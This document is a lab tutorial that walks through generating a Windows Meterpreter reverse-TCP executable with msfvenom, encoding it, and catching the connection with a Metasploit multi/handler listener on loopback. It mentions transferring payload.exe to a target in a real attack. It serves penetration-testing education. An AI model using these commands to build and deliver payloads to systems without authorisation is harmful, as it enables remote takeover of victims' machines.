Introduction
In this lab, you will get hands-on experience with msfvenom, a command-line instance of the Metasploit Framework that is used to generate payloads. It is a combination of two older tools, msfpayload and msfencode, providing a single, powerful tool for creating shellcode for a wide range of targets and in various formats.
The primary goal of this lab is to guide you through the process of generating a standalone Windows executable payload. You will learn how to select a payload, configure its options like the listening host and port, and finally, set up a listener in msfconsole to catch the connection from the payload. All operations will be performed within the ~/project directory.
List available payloads with msfvenom --list payloads
In this step, you will begin by exploring the capabilities of msfvenom. The first thing to learn about any tool is what it can do. You can list all available payloads using the --list payloads option. This will give you a comprehensive list of all the shellcode that msfvenom can generate for different operating systems, architectures, and applications.
Execute the following command in your terminal to see the full list of payloads:
msfvenom --list payloads
The output will be very long. In a real-world scenario, you would typically filter this list to find a specific payload. For example, if you are targeting a Windows machine, you can use grep to search for relevant payloads. Let's try to find the windows/meterpreter/reverse_tcp payload, which we will use in the next steps.
msfvenom --list payloads | grep "windows/meterpreter/reverse_tcp"
You should see an output similar to this, confirming the payload exists:
windows/meterpreter/reverse_tcp Windows Meterpreter (Reflective Injection), Reverse TCP Stager
This confirms that msfvenom can generate this specific payload.
Generate a Windows executable with msfvenom -p windows/meterpreter/reverse_tcp
In this step, you will select a specific payload to generate. Based on our search in the previous step, we will use windows/meterpreter/reverse_tcp. This is a very common and powerful payload. It creates a "reverse" connection from the target machine back to you, and the "Meterpreter" is an advanced, feature-rich shell that allows for extensive post-exploitation activities.
To select a payload in msfvenom, you use the -p (or --payload) option. Let's try to build the command with just the payload selected.
Run the following command in your terminal:
msfvenom -p windows/meterpreter/reverse_tcp
You will notice that this command fails and produces an error message. This is expected.
[-] No options configured yet, getting options from payload...
[-] > LHOST is a required option
Error: LHOST is a required option
The output clearly states that LHOST is a required option. This is because a reverse TCP payload needs to know which IP address to connect back to. In the next step, we will provide this required information.
Set LHOST and LPORT for the payload
In this step, you will provide the necessary options for the payload to function correctly. As the error message from the previous step indicated, we need to set LHOST.
LHOST: This stands for "Listening Host". It's the IP address of the machine where you will be listening for the incoming connection from the payload. For this lab, we will run the listener on the same machine, so we can use the loopback IP address,127.0.0.1.LPORT: This stands for "Listening Port". It's the port on theLHOSTthat the listener will be bound to. You can choose any non-privileged port that is not in use. A common choice for this is4444.
You can set these options directly on the command line. Let's add LHOST and LPORT to our previous command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444
After running this command, you will see a large block of characters printed directly to your terminal. This is the raw shellcode for the payload.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No Arch selected, choosing Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 354 bytes
<...raw bytes will be printed here...>
This is not very useful as a standalone file. In the next step, you will learn how to format this raw shellcode into a usable executable file.
Specify the output format and file name using -f exe and -o
In this step, you will finalize the payload by specifying its format and saving it to a file. Printing raw shellcode to the terminal is not practical for delivery. We need to package it into a format that the target operating system can execute.
msfvenom provides two important options for this:
-for--format: This option specifies the output format. Since our target is Windows, we will use theexeformat to create a standard Windows executable.-oor--out: This option specifies the path and filename for the output file.
Let's combine all the options we've learned into a single, final command. This command will generate a Windows executable named payload.exe in your current directory (~/project).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o payload.exe
After the command completes, you will see output confirming the payload's creation:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No Arch selected, choosing Arch: x86 from the payload
Found 1 compatible encoder
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe
You can verify that the file has been created using the ls -l command:
ls -l payload.exe
The output should show the newly created file:
-rwxr-xr-x 1 labex labex 73802 May 20 10:00 payload.exe
You have now successfully generated a standalone payload file.
Create a listener in msfconsole to catch the connection
In this step, you will set up a listener to handle the connection from the payload you just created. A payload is useless unless you have something on your end to "catch" the reverse connection it makes. For this, we will use msfconsole, the primary interface to the Metasploit Framework.
First, start msfconsole. Using the -q flag makes it start quietly without showing the banner, which is cleaner.
msfconsole -q
Your prompt will change to msf6 >. Now, you need to configure a handler to listen for the incoming connection. The settings for the handler must exactly match the settings you used to generate the payload.
Use the
exploit/multi/handlermodule. This is a generic handler for incoming connections.use exploit/multi/handlerSet the payload to match the one you generated.
set payload windows/meterpreter/reverse_tcpSet
LHOSTto the same IP address.set LHOST 127.0.0.1Set
LPORTto the same port.set LPORT 4444Finally, run the listener.
run
msfconsole will now display a message indicating that the listener has started.
[*] Started reverse TCP handler on 127.0.0.1:4444
At this point, the listener is active and waiting. In a real attack, you would transfer payload.exe to a Windows target and execute it. When executed, it would connect back to this listener, and you would get a Meterpreter session. Since we don't have a target Windows machine in this lab, we will not see a connection. The goal here is to learn the complete process of generating a payload and setting up its corresponding listener.
To exit the listener, press Ctrl + C. To exit msfconsole, type exit and press Enter.
exit
Summary
In this lab, you have successfully learned the fundamentals of generating standalone payloads using msfvenom. You practiced the entire workflow, from exploring available payloads to creating a final executable file and setting up a listener to handle its connection.
You are now familiar with key msfvenom options, including:
--list payloadsto see available payloads.-pto select a specific payload likewindows/meterpreter/reverse_tcp.LHOSTandLPORTto configure the payload's connection details.-fto set the output format (e.g.,exe).-oto save the payload to a file.
Additionally, you learned how to use the exploit/multi/handler within msfconsole to create a listener that matches your payload's configuration. This knowledge forms a critical foundation for many penetration testing and security research tasks.
